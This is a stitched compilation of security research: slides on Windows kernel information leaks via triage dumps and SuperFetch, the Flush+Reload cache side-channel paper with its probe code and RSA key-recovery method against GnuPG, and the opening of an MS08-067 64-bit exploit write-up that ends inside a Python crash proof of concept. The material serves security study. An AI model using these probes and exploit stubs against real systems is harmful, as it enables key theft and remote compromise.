■
A driver, kldbgdrv.sys is used by 
 WinDBG
 instead
■
Calls 
 KdSystemDebugControl
 , which checks if /DEBUG is active
■
In Vista, a new command was added, and allowed even without 
being in /DEBUG 
 mode
■
SYSDBG_COMMAND
 ::
SysDbgGetTriageDump
■
Debug Privilege is required
What’s in a Triage Dump?
■
A typical crash dump header
■
KPCR, KPRCB, KUSER_SHARED_DATA, DPC Queues, Timer Table, 
etc...
■
Information on the process that was selected for the dump
■
PEPROCESS structure and relevant fields
■
Information on all the threads part of the process selected
■
PETHREAD structure and relevant fields
■
APC queue, pending IRPs, and wait queues
■
Kernel Stack Trace and Context
■
And then Win32k “callback“ gets called...
■
Dumps all 
 tagTHREADINFO
 + 
tagPROCESSINFO
■
Dumps all global variables!
SuperFetch API Leaks
What’s SuperFetch?
■
System component that tracks usage patterns and activities 
across one or multiple users on the machine
■
Application Launch
■
System Power Transitions
■
User Session Transitions
■
Also tracks usage
■
All File I/O
■
All Page Faults
■
Builds predictive database of application launches (Markov chain) 
and informs memory manager of priorities that each page should 
be given in memory and in the cache
■
Based on usage patterns over periods of up to 6 months
SuperFetch API
■
SuperFetch lives in user
 -
mode!
■
sysmain.dll service inside one of the hosts
■
How does it track all page faults and File I/O
■
Partially through IOCTLs to 
 FileInfo
 driver
■
Partially through undocumented API
■
NtQuerySystemInformation
■
Class: 
 SystemSuperfetchInformation
■
Implements a variety of subclasses...
SuperFetch Information Subclasses
■
SUPERFETCH_INFORMATION must be the buffer passed in
■
SUPERFETCH_INFORMATION_CLASS determines the operation
■
Query 
 all “sources”
■
Dump memory lists
■
Dump PFN database and page usages
■
~12 total queries in Win7, ~20 in Win8
■
Need version number (45 on Windows 7
 )
■
Need “magic password” (‘
 Chuk
 ’)
■
Need System Profile privilege
SuperFetch Information Leaks
■
Querying for all sources will dump all PEPROCESS pointers
■
Querying for the trace (if you don’t race with the actual SuperFetch 
service, or if you disable it) will dump file object pointers, virtual 
addresses, and program counters
■
But the real deal is querying the PFN database!
■
PFN Database contains information on every physical page on the system 
and its usage
■
A few years ago, I wrote a tool to dump this...
■
Now there’s 
 RAMMap
Conclusion
Key Takeaways
■
Unlike certain platforms such as 
 iOS
/OS X where kernel 
information disclosures seem to be taken rather seriously (even 
the GDT/IDT is aliased to prevent leaking the kernel base 
address!), Windows has a rather liberal policy toward kernel 
pointers
■
Not quite as bad as Linux, however. Microsoft does care.
■
Why don’t they “fix” these?
■
Most of the times, the answer is app compatibility
■
Other times, it’s developer support/requests
■
However, requiring admin rights across the board for such system
 -
level APIs may hit the right balance
■
That’s not enough for DRM/Surface environments, however
Further Reading
■
The NDK (Native Development Kit) is a header kit that I maintain 
which has the closest possible undocumented structure definitions
■
Even “j00ru” used old/incorrect/unknown structures in his papers 
 
■
NDK was built with information from PDBs, ASSERTs (before 
NT_ASSERT), private PDB (yep... the Windows 8 ones are still on the 
symbol server....) and .h leaks over the years, etc...
■
*NO* source code leak/
 etc
material used.
■
J00ru’s blog and most recent talks at 
 CONFidence
 2013 and 
Syscan
 2013
QA
■
Greetz
 /shouts to: j00ru, 
 msuiche
 , 
lilhoser
Flush+Reload : a High Resolution, Low Noise, L3 Cache
Side-Channel Attack
Yuval Yarom Katrina Falkner
School of Computer Science
The University of Adelaide
{yval,katrina}@cs.adelaide.edu.au
18 July 2013
Abstract
Flush+Reload is a cache side-channel attack that monitors access to data in shared pages. In
this paper we demonstrate how to use the attack to extract private encryption keys from GnuPG.
The high resolution and low noise of the Flush+Reload attack enables a spy program to recover
over 98% of the bits of the private key in a single decryption or signing round. Unlike previous
attacks, the attack targets the last level L3 cache. Consequently, the spy program and the victim do
not need to share the execution core of the CPU. The attack is not limited to a traditional OS and
can be used in a virtualised environment, where it can attack programs executing in a different VM.
1 Introduction
Side channel attacks are attacks that target an implementation of a cryptographic system rather than
targetting theoretical weaknesses of the system. Cache side-channel attacks are a form of side channel
attacks that rely on the timing difference between accessing cached and non-cached values.
Cache side-channel attacks have been used in the past against RSA [1, 13], Elgamal [21], DSA [2]
and AES [9, 16, 20]. With one notable exception all of these attacks rely on monopolising the cache by
accessing enough data to force the victim’s data out of the cache.
As most memory activity occurs in the L1 cache, and as monopolising L1 is much simpler than
monopolising lower cache levels [13], all of these attacks target the L1 cache and must, therefore, execute
on the same CPU core as the victim.
Gullasch et al. [9] describe a cache side-channel attack that relies on shared memory pages between
the spy program and the victim. This attack, which we call Flush+Reload , evicts specific memory
lines out of the cache without monopolising the cache. Flush+Reload evicts the selected memory
line from all the cache levels, including L3. This feature, which is not exploited by Gullasch et al.,
allows the attack to be used between processes executing on different execution cores of the same CPU.
Furthermore, as virtual machine hypervisors transparently share memory pages between VMs [5,19], the
attack is applicable across the isolation layer between VMs.
In this paper we describe the Flush+Reload attack and demonstrate its use against the GnuPG [7]
implementation of RSA. We use the attack to probe GnuPG at a resolution of 1.5MHz. This high
resolution, combined with the low noise of the attack allows us to recover over 98% of the bits of the
secret key by capturing a single signing or decryption operation.
Sections 2 and 3 provide background information about the cache architecture and about RSA. We
describe the Flush+Reload attack in section 4 and its application to GnuPG in section 5.
2 Cache Architecture and Side-Channel Attacks
Processor caches bridge the gap between the processing speed of modern processors and the data retrieval
speed of the memory. Caches are small banks of fast memory in which the processor stores values of
recently accessed memory cells. Due to locality of reference, recently used values tend to be used again.
Retrieving these values from the cache saves time and reduces the pressure on the main memory.
1
Modern processors employ a cache hierarchy consisting of multiple caches. For example, the cache
hierarchy of the Core i5-3470 processor, shown in Diagram 1, consists of three cache levels: L1, L2 and
L3.
32 KBL1 Data
L2 256KBCore 2
32 KBL1 Inst
32 KBL1 Data
L2 256KBCore 3
L3 Unified − 6MB32 KBL1 Inst
32 KBL1 DataCore 0
L2 256KB32 KBL1 Inst
32 KBL1 Data
L2 256KBCore 1
32 KBL1 Inst
Figure 1: Intel Ivy Bridge Cache Architecture
The Core i5-3470 processor has four processing units called cores . Each core has a 64KB L1 cache,
divided into a 32KB data cache and a 32KB instruction cache. Each core also has a 256KB L2 cache.
The four cores share a 6MB L3 cache.
The unit of memory in a cache is a linewhich contains a fixed number of bytes. A cache consists of
multiple cache sets each of which stores a fixed number of cache lines. The number of cache lines in a
set is the cache associativity . Each memory line can be cached in any of the cache lines of a single cache
set. The size of cache lines in the Core i5-3470 processor is 64 bytes. The L1 and L2 caches are 8-way
associative and the L3 cache is 12-way associative.
Retrieving data from memory or from lower cache levels takes longer than retrieving it from higher
cache levels. This difference in timing has been exploited for side-channel attacks. Tromer et al. [16]
identifies two forms of cache side-channel attacks: the Evict+Time attack and the Prime+Probe
attack.
AnEvict+Time attack works by setting the cache to a known state, typically by executing a round
of computation, evicting selected sets from the cache and measuring the time it takes to perform a round
of computation. The time to perform the computation depends on which values are in the cache when
the computation starts. Consequently, timing the computation provides information about the memory
locations that the computation accesses.
APrime+Probe attack fills the cache with known memory lines, waits some time and times reading
these memory lines to checks which of them were evicted from the cache, if any. Again, knowledge of
which cache sets have been accessed provides information on memory locations used by the computation
and, consequently, on the data it processes.
These techniques tend to be more applicable for implementing side-channels through the L1 cache,
rather than the lower cache levels. One reason for that is that caching is based on physical memory
addresses, whereas processes use virtual addresses. With L1 caches, a byte offset in a page always map
to the same cache set. Hence, for evicting a set or for priming the cache the attacker needs only as many
pages as the cache associativity, and any pages would do.
With larger caches, the virtual memory masks the mapping between memory pages and cache sets.
Furthermore, this mapping is not necessarily stable and can change during the execution of the program.
Techniques for reconstructing the mapping have been suggested [10]. However, these techniques only
provide the mapping for the attacker’s memory. The victim’s mapping is, still, unknown.
The second limitation on these technique is the size of the L3 cache. The effect of cache size on
thePrime+Probe attack is to increase the prime and probe time significantly, reducing the potential
granularity of the attack. For the Evict+Time approach, a large cache presents a big search space,
increasing the complexity of attacks.
With practical attacks limited to the L1 cache, the techniques described above only work when the
victim and the spy programs share the same execution core.
Gullasch et al. [9] describes a cache side-channel attack that we call Flush+Reload . The attack is
similar to Prime+Probe in the sense that it monitors the cache changes during the execution of the
computation. However, unlike Prime+Probe ,Flush+Reload evicts selected memory lines from the
2
cache and measures the time to reload these lines to detect their use by the computation.
We discuss the Flush+Reload attack in Section 4
3 RSA
RSA [14] is a public-key cryptographic system that supports encryption and signing. Generating an
encryption system requires the following steps:
•Randomly selecting two prime numbers pandqand calculating n=pq.
•Choosing a public exponent e. GnuPG uses e= 65537.
•Calculating a private exponent d≡e−1(mod (p−1)(q−1)).
The generated encrypted system consists of:
•The public key is the pair ( n,e).
•The private key is the triple ( p,q,d ).
•The encrypting function is E(m) =memodn.
•The decrypting function is D(c) =cdmodn.
A common optimisation for the implementation of the decryption function is to use:
dp=dmod (p−1)
dq=dmod (q−1)
Mp=Cdpmodp
Mq=Cdqmodq
Mis then computed from MpandMqusing the Garner’s formula [6]:
h= (Mp−Mq)(q−1modp) modp
M=Mq+hq
To compute the encryption and decryption functions, GnuPG uses the square-and-multiply exponen-
tiation algorithm [8]. Square-and-multiply computes x=bemodmby scanning the bits of the binary
representation of the exponent e. Given a binary representation of eas 2n−1en−1+···20e0, square-and-
multiply calculates a sequence of intermediate values xn−1,...,x 0such thatxi=b⌊e/2i⌋modmusing
the formula xi−1=xi2bei−1. Figure 2 shows a pseudo-code implementation of square-and-multiply.
function exponent( b,e,m)
begin
x←1
fori←|e|−1 downto 0 do
x←x2
x←xmod m
if (ei= 1) then
x←xb
x←xmod m
endif
done
return x
end
Figure 2: Exponentiation by Square-and-Multiply
As can be seen from the implementation, an attacker that can trace the execution of the square-and-
multiply exponentiation algorithm can recover the exponent. Obviously, if the exponent is d, an attacker
recovering the exponent has broken the encryption. However, as GnuPG uses the optimisation described
above, the attacker can only hope to extract dpanddq. We will now show that extracting any one of dp
anddqis enough to factor nand, consequently, to break the encryption.
3
The first point to note is that because n=pq, for everyXthere exists an integer αsuch that
Xmodn=Xmodp+αp
Consequently,
Cdpmodn=Cdpmodp+αp
Asdp=dmod (p−1), by applying Fermat’s Little Theorem to the above we get
Cdpmodn=Cdmodp+αp
Now, as there exists a α′such thatCdmodn=Cdmodp+α′p, we get
Cdpmodn=Cdmodn−α′p+αp
or
Cdpmodn=M+ (α−α′)p
Thuspcan be calculated using
p= gcd((Cdp−M) modn,n)
The next section describes the Flush+Reload attack that we use to extract the exponent from
GnuPG.
4 The Flush+Reload Attack
TheFlush+Reload attack is a variant of the Prime+Probe attack that relies on sharing pages
between the spy and the victim programs. With shared pages, the spy program can ensure that a
specific memory line is evicted from the whole cache hierarchy. The spy uses this to monitor access to
the memory line.
A round of attack consists of three phases. During the first phase, the monitored memory line is
flushed from the cache hierarchy. The spy program, then, waits to allows the victim time to access
the memory line before the third phase. In the third phase, the spy program reloads the memory line,
measuring the time to load it. If during the wait phase the victim accesses the memory line, the line
will be available in the cache and the reload operation will take a short time. If, on the other hand, the
victim has not accessed the memory line, the line will need to be brought from memory and the reload
will take significantly longer. Diagrams 3 (A) and (B) show the timing of the attack phases without and
with victim access.
As shown in Diagram 3 (C), the victim access can overlap the reload phase of the spy program. In
such a case, the victim access will not trigger a cache fill. Instead, the victim will use the cached data
from the reload phase. Consequently, the spy program will miss the access.
A similar scenario is when the reload operation partially overlaps the victim access. In this case,
depicted in Diagram 3 (D), the reload phase starts while the victim is waiting for the data. The reload
benefits from the victim access and terminates faster than if the data has to be loaded from memory.
However, the timing may still be longer than a load from the cache.
As the victim access is independent of the spy program code, increasing the wait period reduces
the probability of missing the access due to an overlap. On the other hand, increasing the wait period
reduces the granularity of the attack.
One way to improve the resolution of the attack without increasing the error rate is to target memory
accesses that occur frequently, such as a loop body. The attack will not be able to discern between
separate accesses, but, as shown in Diagram 3 (E), the likelihood of missing the loop is small.
It should be noted that several processor optimisations may result in false positives due to speculative
memory accesses issued by the victim’s processor [11]. These optimisations include data prefetching to
exploit spatial locality and speculative execution [17]. When analysing the attack results, the attacker
must be aware of these optimisations and develop strategies to filter them.
Our implementation of the attack is in Figure 4. The code measures the time to read the data at a
memory address and then evicts the memory line from the cache. This measurement is implemented by
the inline assembly code within the asmcommand.
The assembly code takes one input, the address, which is stored in register %ecx . (Line 16.) It returns
the time to read this address in the register %eax which is stored in the variable time . (Line 15.)
4
Attacker(A)Victim
Victim
Attacker(B)
Victim
Attacker(C)
Victim
Attacker(D)
Victim
Attacker(E)
Flush Wait ReloadAttacker
Access Somethin elseVictimFigure 3: Timing of Flush+Reload . (A) No Victim Access (B) With Victim Access (C) Victim Access
Overlap (D) Partial Overlap (E) Multiple Victim Accesses
Line 10 reads 4 bytes from the memory address in %ecx , i.e. the address pointed by adrs . To measure
the time it takes to perform this read, we use the processor’s time stamp counter.
The rdtsc instruction in line 7 reads the 64-bit counter, storing the low 32 bits of the counter in
%eax and the high 32 bits in %edx . As the times we measure are short, we treat it as a 32 bit counter,
ignoring the 32 most significant bits in %edx . Line 9 copies the counter to %esi .
After reading the memory, the time stamp counter is read again. (Line 12). Line 13 subtracts the
value of the counter before the memory read from the value after the read, leaving the result in the
output register %eax .
The crux of the technique is the ability to evict specific memory lines from the cache. This is the
function of the clflush instruction in line 14. The clflush instruction evicts the specific memory line
from allthe cache hierarchy, including the L1 and L2 caches of all cores. Evicting the line from all cores
ensures that the next time the victim accesses the memory line it will be loaded into L3.
The purpose of the mfence and lfence instructions in lines 5, 6, 8 and 11 is to serialise the in-
struction stream. The Intel architecture may execute instructions in parallel or out of order. Without
serialisation, instructions surrounding the measured code segment may be executed within that segment.
Intel recommends using the serialising instruction cpuid for that purpose [12]. However, in virtualised
environments the hypervisor emulates the cpuid instruction. This emulation takes significant time (over
1,000 cycles) and this time is not constant, reducing the granularity and the stability of the attack.
The lfence instruction performs partial serialisation. It ensures that load instructions preceding it
have completed before it is executed and that no instruction following it executes before the lfence
instruction. The mfence instruction orders all memory access, fence instructions and the clflush in-
struction. It is not, however, ordered with respect to other instructions and is, therefore, not sufficient
to ensure ordering.
Line 18 compares the time difference between the two rdtsc instructions against a pre-defined thresh-
old. Loads shorter than the threshold are presumed to be served from the cache, indicating that another
process has accessed the memory line since it was last flushed from the cache. Loads longer than the
threshold are presumed to be served from the memory, indicating no access to the memory line.
The threshold used in the attack is architecture dependent. To find the threshold for the test archi-
tecture, we used the measurement code of the probe in Listing 4 to measure load times from memory
and from the L1 cache level. (To measure the L1 times we removed the clflush instruction in line 14.)
The results of 100,000 measurements of each are presented in Figure 5.
Virtually all loads from the L1 cache take between 33 and 49 cycles. Of the 100,000 measurements
taken we have witnessed 9 outliers, taking over 4,000 cycles. We believe these are the result of OS or
5
1 int probe(char *adrs) {
2 volatile unsigned long time;
3
4 asm __volatile__ (
5 " mfence \n"
6 " lfence \n"
7 " rdtsc \n"
8 " lfence \n"
9 " movl %%eax, %%esi \n"
10 " movl (%1), %%eax \n"
11 " lfence \n"
12 " rdtsc \n"
13 " subl %%esi, %%eax \n"
14 " clflush 0(%1) \n"
15 : "=a" (time)
16 : "c" (adrs)
17 : "%esi", "%edx");
18 return time < threshold;
19 }
Figure 4: Code for the Flush+Reload Technique
0%10%20%30%40%50%60%70%
 0  100  200  300  400  500  600  700  800  900  1000Percent
Probe Time (cycles)From Memory
From L1 Cache
Figure 5: Distribution of Load Times.
hypervisor activity.
Loads from memory show less constant timing. 97% of those take between 200 and 300 cycles.
Another 2% are spread between 300 and 400 cycles, but the numbers are too low to be visible in the
graph. The last 1% is spread between 850 and 1,200 cycles, with a visible peak at 900 cycles. As in with
the L1 measurements, a small number of outliers were seen.
The L1 measurements underestimate the probe time for data that the victim accesses. In an attack,
data the victim accesses is read from the L3 cache. Intel documentation [11] states that the difference
is between 22 and 39 cycles. Based on the measurement results and the Intel documentation we set the
threshold to 120 cycles.
5 Attacking GnuPG
In this section we describe how we use the Flush+Reload technique to extract the components of the
private key from the GnuPG implementation of RSA. The attack can work both in a virtualised and in
a non-virtualised environment.
We executed the test on an HP Elite 8300, which features an Intel Core i5-3470 processor and 8GB
DDR3-1600 memory. The OS is Fedora 18.
The spy program divides time into fixed slots of 2048 cycles each. In each slot it probes one memory
line of the code of each of the square, multiply and modulo reduce calculations. To increase the chance of a
6
 0 100 200 300 400 500
 0  10  20  30  40  50  60  70  80  90  100  110  120  130  140  150  160  170  180  190  200Probe Time (cycles)
Time Slot NumberThresholdSquare
Multiply
ModuloFigure 6: Time measurements of probes
probe capturing the access, we selected memory lines that are executed frequently during the calculation.
After probing each memory line, the spy program busy waits to the end of the time slot.
To facilitate locating the memory lines, we used a version of the gpgprogram that we compiled with
debugging symbols. In a real attack settings, the attacker will need to reverse engineer the attacked
program to locate the memory lines. Debugging information allows us to find the memory addresses
corresponding to each source line without the tedious work of reverse engineering.
Measurement times for the first 200 time slots of the GnuPG signing are displayed in Figure 6. Mea-
surements under the threshold indicate victim access to the respective memory line. The exponentiations
for signing takes a total of 22,402 slots or about 15ms. The exponents used have a total of 2046 bits. Of
these 9 were missed and 25 were inverted, giving an error rate of 1.6%.
Diagram 7 is an enlarged view of the boxed section in Diagram 6. As the displayed area is below the
threshold, the diagram only displays the memory lines that were retrieved from the cache, showing the
activity of the GnuPG encryption. The steps of the exponentiation are clearly visible in the diagram.
For example, between time slots 13 and 17 the victim was calculating a square, Time slots 18–21 are for
modulo reduce calculation and 29–33 for multiplication.
 40 45 50 55 60 65 70 75 80
 15  20  25  30Probe Time (cycles)
Time Slot NumberSquare Reduce Multiply
Figure 7: Time measurements of probes
Sequences of Square-Reduce-Multiply-Reduce indicate a 1 bit. Sequences of Square-Reduce which
are not followed by Multiply indicate a 0 bit. The bit sequence shown in Diagram 6 is, therefore,
01010000110011110. These bits match the start of dp. Table 1 shows the time slots corresponding to
each bit. The modulo reduce calculation between time slots 0 and 3 is for calculating dp=dmodp. The
modulo reduce between slots 8 and 11 is for reducing the message hash to modulus p.
Speculative execution is apparent in the graph. For example, in slot 94 the memory lines corre-
sponding to all three operations are loaded from the cache. Obviously, under normal execution of the
exponentiation, Multiply and Square cannot occur in the same time slot. The reason all three memory
locations are accessed is that the processor tries to predict the future behaviour of the program. In the
case of a conditional branch instruction, the processor may start following one of the branches or even
7
Seq. Time Slots Value
1 13–21 0
2 21–37 1
3 38–45 0
4 45–59 1
5 59–65 0
6 66–73 0Seq. Time Slots Value
7 73–80 0
8 80–87 0
9 87–101 1
10 102–116 1
11 116–123 0
12 123–130 0Seq. Time Slots Value
13 130–144 1
14 145–159 1
15 159–173 1
16 163–187 1
17 188–194 0
Table 1: Time Slots for Bit Sequence
both before evaluating the condition. Only when the condition is evaluated the processor will commit
to the execution.
In time slot 94, the processor speculated that the value of the current bit may be 0. It, therefore,
skipped the if body and fetched the memory line of the Square operation. When the value of the bit was
evaluated, the processor terminated the speculated branch and proceeded with the Multiply step.
6 Conclusions
This paper describes the Flush+Reload attack and its use for extracting the RSA private key from
GnuPG. The attack is able to recover over 98% of the bits of the private key, virtually breaking the key,
by capturing a single decryption or signing round. The attack requires the spy program and the victim
to share pages, and can work over the isolation layer of virtualised systems.
It is hard to overstate the severity of the weakness in GnuPG. GnuPG is a very popular cryptography
package. It is used as the cryptography module of many open-source projects and is used, for example,
for email, file and communication encryption. With our attack, any process running on the system can
extract private keys. Hence, GnuPG in its current form is not safe for a multi-user system or for any
system that may run untrusted code.
Past research has indicated that the square-and-multiply exponentiation may be vulnerable to side
channel attacks. The most important lesson that software developers can take from this paper is that
sometimes the reuse of an existing technique is all it takes to change a theoretical weakness to an
exploitable vulnerability.
It may be possible that other known weaknesses can become exploitable with this attack. Examples
that come to mind include identifying the extra reduction in Montgomery Multiplication [3,15] and the
Vaudenay padding oracle attack [4, 18]. Further research is required to determine the extent to which
Flush+Reload can be used as part of such attacks and whether existing countermeasures provide
sufficient protection against Flush+Reload .
It should be noted that the attack is not limited to cryptography software. Other software may
leak sensitive information through the cache. This is particularly worrying in a virtualised environment,
where users expect complete isolation between VMs. Memory de-duplication may save resources, but it
compromises security. We recommend that memory de-duplication in virtualised systems is disabled.
Acknowledgments
This research was performed under contract to the Defence Science and Technology Organisation (DSTO)
Maritime Division, Australia.
References
[1] O. Acıi ̧ cmez, “Yet another microarchitectural attack: exploiting I-Cache,” in Proceedings of the
ACM Workshop on Computer Security Architecture , Fairfax, Virginia, United States, November
2007, pp. 11–18.
[2] O. Acıi ̧ cmez, B. B. Brumley, and P. Grabher, “New results on instruction cache attacks,” in Proceed-
ings of the Workshop on Cryptographic Hardware and Embedded Systems , Santa Barbara, California,
United States, August 2010, pp. 110–124.
8
[3] O. Acıi ̧ cmez and W. Schindler, “A vulnerability in RSA implementations due to instruction cache
analysis and its demonstration on OpenSSL,” in Proceedings of the Cryptographers’ Track at the
RSA Conference , San Francisco, California, United States, April 2008, pp. 256–273.
[4] N. J. AlFardan and K. G. Paterson, “Plaintext-recovery attacks against datagram TLS,” in Proceed-
ings of the 19th Annual Network & Distributed Systems Security Symposium , San Diego, California,
United States, February 2012.
[5] A. Arcangeli, I. Eidus, and C. Wright, “Increasing memory density by using KSM,” in Proceedings
of the Linux Symposium , Montreal, Quebec, Canada, July 2009, pp. 19–28.
[6] H. L. Garner, “The residue number system,” IRE Transactions on Electronic Computers , vol. EC-8,
no. 2, pp. 140–147, June 1959.
[7] “GNU Privacy Guard,” http://www.gnupg.org, 2013.
[8] D. M. Gordon, “A survey of fast exponentiation methods,” Journal of Algorithms , vol. 27, no. 1,
pp. 129–146, April 1998.
[9] D. Gullasch, E. Bangerter, and S. Krenn, “Cache games — bringing access-based cache attacks
on AES to practice,” in Proceedings of the IEEE Symposium on Security and Privacy , Oakland,
California, United States, may 2011, pp. 490–595.
[10] R. Hund, C. Willems, and T. Holz, “Practical timing side channel attacks against kernel space
ASLR,” in Proceedings of the IEEE Symposium on Security and Privacy , San Francisco, California,
United States, May 2013, pp. 191–205.
[11] Intel 64 and IA-32 Architecture Optimization Reference Manual , Intel Corporation, April 2012.
[12] G. Paoloni, How to Benchmark Code Execution Times on Intel IA-32 and IA-64 Instruction Set
Architectures , Intel Corporation, September 2010.
[13] C. Percival, “Cache missing for fun and profit,” http://www.daemonology.net/papers/htt.pdf, 2005.
[14] R. L. Rivest, A. Shamir, and L. Adleman, “A method for obtaining digital signatures and public-key
cryptosystems,” Communications of the ACM , vol. 21, no. 2, pp. 120–126, February 1978.
[15] W. Schindler, “A timing attack against RSA with the Chinese remainder theorem,” in Proceed-
ings of the Workshop on Cryptographic Hardware and Embedded Systems , no. 109–124, Worcester,
Massachusetts, United States, August 2000.
[16] E. Tromer, D. A. Osvik, and A. Shamir, “Efficient cache attacks in AES, and countermeasures,”
Journal of Cryptology , vol. 23, no. 2, pp. 37–71, January 2010.
[17] A. K. Uht and V. Sindagi, “Disjoint eager execution: An optimal form of speculative execution,”
inProceedings of the 28th International Symposium on Microarchitecture , Ann Arbor, Michigan,
United States, November 1995, pp. 313–325.
[18] S. Vaudenay, “Security flaws induced by CBC padding. applications to SSL, IPSEC, WTLS. . . ,” in
EUROCRYPT 2002, Proceedings of the International Conference on the Theory and Applications
of Cryptographic Techniques , Amsterdam, The Netherlands, April 2002, pp. 534–546.
[19] C. A. Waldspurger, “Memory resource management in VMware ESX Server,” in Proceedings of the
Fifth Symposium on Operating Systems Design and Implementation , Boston, Massachusetts, United
States, December 2002, pp. 181–194.
[20] M. Weiß, B. Heinz, and F. Stumpf, “A cache timing attack on AES in virtualization environments,”
inProceedings of the 16th International Conference on Financial Cryptography and Data Security ,
Bonaire, February 2012.
[21] Y. Zhang, A. Jules, M. K. Reiter, and T. Ristenpart, “Cross-VM side channels and their use to
extract private keys,” in Proceedings of the 19th ACM Conference on Computer and Communication
Security , Raleigh, North Carolina, United States, October 2012, pp. 305–316.
9 
 
 
MWR Labs Whitepaper  
 
 
Hello MS08 -067, My Old Friend!  
 
Jason Matthyser  
 
 
labs.mwrinfosecurity.com   
 2  Contents page  
 
1. Introduction  ................................ ...............  3 
2. Crash it, and the Exploit will Come  ........................  4 
2.1 The RPC request  ................................ ................................ ................................ ... 4 
2.2 What the Access Violation ? ................................ ................................ .................  5 
2.3 Ground Rules - Because Server 2003 x64 Said So  ................................ .................  6 
3. The Exploit (I know you skipped the above)  .................  9 
3.1 Tools – Yes, No mona.py !................................ ................................ .......................  9 
3.2 One RET to Rule Them All  ................................ ................................ ...................  10 
3.3 From DEP to INT3 ................................ ................................ ................................  16 
3.4 You’re in the “ NT AUTHORITY \SYSTEM ” ................................ ................................ .. 18 
3.5 Reliability Considerations  ................................ ................................ ...................  20 
4. References  ................................ ................  21 
  
 
labs.mwrinfosecurity.com   
 3  1. Introduction  
Since the discovery of MS08 -067, a buffer overflow vulnerability triggered by a specially crafted RPC 
request, much has been done to create a working exploit to target vulnerable hosts. This work by the 
security community was largely motivated by the vulnerability’s impact – unauthenticated remote code 
execution, in a SYSTEM context, against numerous versions of Microsoft Windows [ 1].  
As a result, many publicly available proof of concept exploits (PoCs) exist for this vulnerability. It is also 
used by the well -known Conficker worm [ 2]. However, all of the publicly available PoCs were found to  only 
target the affected 32 -bit systems, prior to Windows Vista, listed in Microsoft's security bulletin [ 1]. Since 
the vulnerability's discovery, no PoCs for the affected 64 -bit systems have been widely released.  
The article provides an overview of the development of such a PoC. More specifically, the article targets 
Windows Server 2003 x64, SP0. This article does not introduce new techniques to the field of exploit 
development, but simply documents a real -world encounter with  64-bit exploit development, while 
discussing the challenges associated with 64 -bit exploit development.  
  
 
labs.mwrinfosecurity.com   
 4  2. Crash it, and the Exploit will Come  
Before digging into the actual exploit, it is necessary to provide an overview of the crash, the RPC request 
that results in the crash, and some of the interesting constraints imposed on the exploit development by 
the 64 -bit architecture and RPC request stub. This article won’t be covering the actual vulnerability, as 
other resources are available for this purpose  [4]. 
It is not of the utmost importance to delve into every resource available to understand this exploit, but 
taking some time to understand the vulnerable code [ 3] and also fiddle with the crash PoC is 
recommended.  
The vulnerability is caused by the way that the NetprPathCanonicalize  function,  exported by 
netapi32.dll , processes its input. The existing PoCs can all be seen targeting the Server service, which 
uses the vulnerable function in netapi32.dll  to process the path provided via RPC requests.  
2.1 The RPC request  
For simplicity, only the relevant components of the RPC request stub are covered – how the stub looks, 
what the exploit -relevant values in the stub mean, and how they can be manipulated. The pyth on code 
snippet below shows the stub skeleton used for this exploit.  
# Misc 
stub =  ' \x01\x00\x00\x00'    # Reference ID  
 
# Server UNC  
stub += ' \x10\x00\x00\x00'    # Server UNC - Max Buffer Count  
stub += ' \x00\x00\x00\x00'    # Offset  
stub += ' \x10\x00\x00\x00'    # Server UNC - Actual Buffer Count  
stub += ' \x50\x50'*15         # Server UNC Buffer Content  
stub += ' \x00\x00'*1          # Server UNC Trailing Null Bytes  
 
# RPC Path  
stub += ' \x2f\x00\x00\x00'    # RPC Path - Max Buffer Count  
stub += '\x00\x00\x00\x00'    # Offset  
stub += ' \x2f\x00\x00\x00'    # RPC Path - Actual Buffer Count  
stub += ' \x41\x41'*46         # RPC Path Buffer  
stub += ' \x00\x00'*1          # RPC Path Trailing Null Bytes  
 
# Misc 
stub += ' \x00\x00'            # Padding  
stub += '\x01\x00\x00\x00’    # Max Buffer Count  
stub += ' \x02\x00\x00\x00'    # Prefix - Max Unicode Count  
stub += ' \x00\x00\x00\x00'    # Offset  
stub += ' \x02\x00\x00\x00'    # Prefix - Actual Unicode Count  
stub += ' \x5c\x00\x00\x00'    # Prefix + Trailing N ull Bytes  
stub += ' \x01\x00\x00\x00'    # Pointer to Path Type  
stub += ' \x01\x00\x00\x00'    # Path Type and Flags  
 
The two important buffers in the above snippet are the Server UNC buffer and the RPC Path buffer. These 
buffers both form part of the final exploit, as the RPC Path buffer will be used to trigger the vulnerability, 
and perform other stack manipulation func tions, and the Server UNC buffer will contain the final ROP -
chain and shellcode for the exploit.  
 
labs.mwrinfosecurity.com   
 5  Notice that both buffers have their own descriptively named "Max Buffer Count" and "Actual Buffer Count" 
values. For this exploit these two values will be kep t the same for each of the respective buffers. These 
values correspond to the number of Unicode characters that the buffer must have , including the Unicode 
null byte at the end of the buffer. This is useful, as it allows adjustment of the two buffer sizes,  depending 
on the requirements of the exploit.  
2.2 What the Access Violation ? 
Now to crash the Server service. The crash PoC demonstrated in this section was borrowed from existing 
exploits and resources. In the code snippet below, the malicious path in the RP C Path buffer is used to 
trigger the vulnerability . The screenshot following the code shows a successful Access Violation  due to 
an attempt to execute an instruction at a location the PoC control s – 0x42424242 , in this case.  The address 
in RIP corresponds to the last four bytes in the RPC path buffer, before the trailing null bytes.  
from impacket import smb  
from impacket import uuid  
from impa cket.dcerpc.v5 import transport  
import struct  
 
trans = transport.DCERPCTransportFactory('ncacn_np:%s[ \\pipe\\browser]' % "192.168.10.21" ) 
trans.connect()  
dce = trans.DCERPC_class(trans)  
dce.bind(uuid.uuidtup_to_bin(('4b324fc8 -1670-01d3-1278-5a47bf6ee188', '3.0')))  
 
# Misc 
stub =  ' \x01\x00\x00\x00'      # Reference ID  
 
# Server UNC  
stub += ' \x10\x00\x00\x00'      # Server UNC - Max Buffer Count  
stub += ' \x00\x00\x00\x00'      # Offset  
stub += ' \x10\x00\x00\x00'      # Server UNC - Actual Buffer Count  
stub += ' \x50\x50'*15           # Server UNC Buffer C ontent 
stub += ' \x00\x00'*1            # Server UNC Trailing Null Bytes  
 
# RPC Path  
stub += ' \x2f\x00\x00\x00'      # RPC Path - Max Buffer Count  
stub += ' \x00\x00\x00\x00'      # Offset  
stub += ' \x2f\x00\x00\x00'      # RPC Path - Actual Buffer Count  
 
# Trigger Path = \A\..\..\ 
stub += ' \x5c\x00\x45\x00\x5c\x00\x2e\x00'  # Trigger Path  
stub += ' \x2e\x00\x5c\x00\x2e\x00\x2e\x00'  # Trigger Path  
stub += ' \x5c\x00'                          # Trigger Path  
 
# Remaining Buffer  
stub += ' \x41\x41'*35           # Remaining RPC Path Buffer  
